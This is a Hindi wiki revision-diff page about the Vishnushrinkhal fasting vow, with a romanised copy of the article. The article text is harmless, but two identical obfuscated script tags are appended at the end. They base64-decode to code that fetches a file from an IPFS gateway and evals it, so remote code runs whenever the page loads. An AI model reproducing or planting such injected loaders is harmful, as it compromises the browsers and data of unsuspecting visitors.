Difference between revisions of "विष्णुश्रृंखल योग"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (Text replace - " {{लेख प्रगति |आधार=आधार1 |प्रारम्भिक= |माध्यमिक= |पूर्णता= |शोध= }}" to "")
m (Text replace - "उल्लखित" to "उल्लिखित")
Line 1: Line 1:
*[[भारत]] में धार्मिक व्रतों का सर्वव्यापी प्रचार रहा है। यह हिन्दू धर्म ग्रंथों में उल्लखित [[हिन्दू धर्म]] का एक व्रत संस्कार है।  
+
*[[भारत]] में धार्मिक व्रतों का सर्वव्यापी प्रचार रहा है। यह हिन्दू धर्म ग्रंथों में उल्लिखित [[हिन्दू धर्म]] का एक व्रत संस्कार है।  
 
*जब [[द्वादशी]] [[एकादशी]] से युक्त हो एवं द्वादशी को [[श्रवण नक्षत्र]] भी हो तो उसे विष्णुश्रृंखल कहा जाता है।
 
*जब [[द्वादशी]] [[एकादशी]] से युक्त हो एवं द्वादशी को [[श्रवण नक्षत्र]] भी हो तो उसे विष्णुश्रृंखल कहा जाता है।
 
*यह व्रत तब करना चाहिए। उस दिन उपवास करने से पापमोचन हो जाता है और [[विष्णु]] से सायुज्य प्राप्त होता है।<ref>हेमाद्रि (व्रतखण्ड 1, 295); कालविवेक (464); पुरुषार्थचिन्तामणि (216-219)।</ref>
 
*यह व्रत तब करना चाहिए। उस दिन उपवास करने से पापमोचन हो जाता है और [[विष्णु]] से सायुज्य प्राप्त होता है।<ref>हेमाद्रि (व्रतखण्ड 1, 295); कालविवेक (464); पुरुषार्थचिन्तामणि (216-219)।</ref>

Revision as of 17:39, 25 February 2011

  • bharat mean dharmik vratoan ka sarvavyapi prachar raha hai. yah hindoo dharm granthoan mean ullikhit hindoo dharm ka ek vrat sanskar hai.
  • jab dvadashi ekadashi se yukt ho evan dvadashi ko shravan nakshatr bhi ho to use vishnushrriankhal kaha jata hai.
  • yah vrat tab karana chahie. us din upavas karane se papamochan ho jata hai aur vishnu se sayujy prapt hota hai.[1]

tika tippani aur sandarbh

  1. hemadri (vratakhand 1, 295); kalavivek (464); purusharthachintamani (216-219).

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>